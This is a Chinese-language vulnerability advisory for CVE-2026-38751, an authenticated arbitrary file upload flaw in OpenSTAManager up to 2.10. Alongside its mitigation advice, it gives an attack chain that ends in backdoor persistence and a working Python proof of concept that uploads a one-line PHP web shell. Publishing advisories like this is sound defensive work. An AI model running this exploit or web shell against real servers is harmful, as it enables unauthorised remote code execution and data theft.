IPBUF安全漏洞报告
English
CVE-2026-38751 CVSS 7.2 高危

CVE-2026-38751 OpenSTAManager任意文件上传漏洞

披露日期: 2026-05-04
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-38751
漏洞类型
任意文件上传
CVSS评分
7.2 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
OpenSTAManager

相关标签

任意文件上传RCEOpenSTAManagerCVE-2026-38751

漏洞概述

OpenSTAManager 2.10及更早版本在模块更新功能中存在任意文件上传漏洞。由于缺乏对上传文件的严格校验,经过身份验证的攻击者可上传恶意文件,导致服务器被完全控制,造成敏感数据泄露、数据篡改或服务中断。

技术细节

该漏洞位于modules/aggiornamenti/upload_modules.php。程序在处理模块更新上传时,未对文件扩展名和内容进行有效过滤。攻击者需利用高权限账户,向该接口发送包含Webshell的POST请求。服务器接收并保存文件后,攻击者通过直接访问该文件触发PHP代码执行,从而获得服务器控制权限,严重影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1
信息收集
识别目标是否运行OpenSTAManager且版本低于或等于2.10。
STEP 2
身份认证
获取目标系统的高权限账户凭证(管理员权限)。
STEP 3
漏洞利用
向/modules/aggiornamenti/upload_modules.php发送特制的POST请求,上传恶意PHP脚本。
STEP 4
代码执行
通过浏览器访问上传的恶意文件路径,在服务器端执行任意系统命令。
STEP 5
维持控制
安装后门或窃取数据,保持对服务器的持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(url, session_cookie): """ PoC for CVE-2026-38751: Arbitrary File Upload """ upload_url = f"{url}/modules/aggiornamenti/upload_modules.php" # Prepare the malicious PHP file payload files = { 'module_file': ('exploit.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php') } # Cookies for high privilege authentication cookies = {'PHPSESSID': session_cookie} try: response = requests.post(upload_url, files=files, cookies=cookies) if response.status_code == 200: print(f"[+] File uploaded. Check: {url}/uploads/exploit.php?cmd=whoami") else: print("[-] Upload failed.") except Exception as e: print(f"Error: {e}") # Usage # exploit('http://target', 'your_session_id')

影响范围

OpenSTAManager <= 2.10

防御指南

临时缓解措施
建议立即在Web服务器层面对上传目录(如uploads目录)配置规则,禁止执行PHP脚本。同时,严格限制对/modules/aggiornamenti/upload_modules.php接口的访问源IP,仅允许内部维护IP访问,直至完成补丁更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表